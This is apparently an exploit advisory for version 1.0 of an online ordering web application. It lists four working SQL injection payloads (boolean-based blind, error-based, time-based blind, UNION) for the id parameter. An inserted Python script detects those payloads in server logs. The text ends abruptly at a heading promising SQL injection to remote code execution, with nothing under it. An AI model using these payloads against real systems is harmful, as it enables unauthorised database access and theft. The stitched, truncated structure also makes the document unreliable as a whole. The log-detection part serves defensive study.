# Exploit Title: Gadget works online ordering system - Authentication Bypass SQLi  
# Date: 03/05/2021  
# Exploit Author: Richard Jones  
# Vendor Homepage:  
# Version: 1.0  
# Tested on: Windows 10 build 19041 + xampp 3.2.4  
SQL Injection details:   
*replace IP with the website's IP  
Parameter: id (GET)  

Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: q=single-item&id=(SELECT (CASE WHEN (5628=5628) THEN 1 ELSE (SELECT 9686 UNION SELECT 8857) END))  

Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: q=single-item&id=1 OR (SELECT 3320 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3320=3320,1))),0x716a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)  

Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: q=single-item&id=1 AND (SELECT 2585 FROM (SELECT(SLEEP(5)))BrmF)  

Type: UNION query  
Title: Generic UNION query (NULL) - 20 columns  
Payload: q=single-item&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71787a7671,0x67664845794943545a51517775675672466965636572474d435a48727a58646750687253474d766d,0x716a706271),NULL-- -  
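
Added example (not part of the original advisory or the vendor's code): a Python triage check for web-server logs that flags q=single-item requests whose id is not a plain integer and labels them with the technique names listed above. The /index.php path, the function names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Labels follow the "Type:" lines of the advisory. Order matters: the
# boolean-based payload also contains UNION SELECT, so CASE WHEN is tested first.
RULES = [
    ("boolean-based blind", re.compile(r"\bCASE\s+WHEN\b", re.I)),
    ("error-based", re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]

def classify_id(value):
    """Return None for a plain integer id, otherwise a label for what was sent."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    for label, pattern in RULES:
        if pattern.search(value):
            return label
    return "non-numeric id"

def triage(request_target):
    """Check one logged request target; only q=single-item requests are in scope."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if "single-item" not in query.get("q", []):
        return None
    for value in query.get("id", []):  # every id is checked if the parameter repeats
        label = classify_id(value)
        if label:
            return label
    return None

# Constructed sample input. "/index.php" is an assumed path; the id values are
# the payloads listed above, with the UNION column list shortened.
SAMPLE_IDS = [
    "7",
    "(SELECT (CASE WHEN (5628=5628) THEN 1 ELSE (SELECT 9686 UNION SELECT 8857) END))",
    "1 OR (SELECT 3320 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3320=3320,1))),"
    "0x716a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
    "1 AND (SELECT 2585 FROM (SELECT(SLEEP(5)))BrmF)",
    "1 UNION ALL SELECT NULL,NULL,NULL-- -",
]
SAMPLE_REQUESTS = ["/index.php?q=single-item&id=" + quote(v) for v in SAMPLE_IDS]

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(triage(target) or "ok", "<-", target[:60])
```

The same integer-only rule used in classify_id is the input check that rejects all four payload types before they reach the query.
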
SQL Injection to RCE  
*replace IP with the website's IP  
RCE execution point: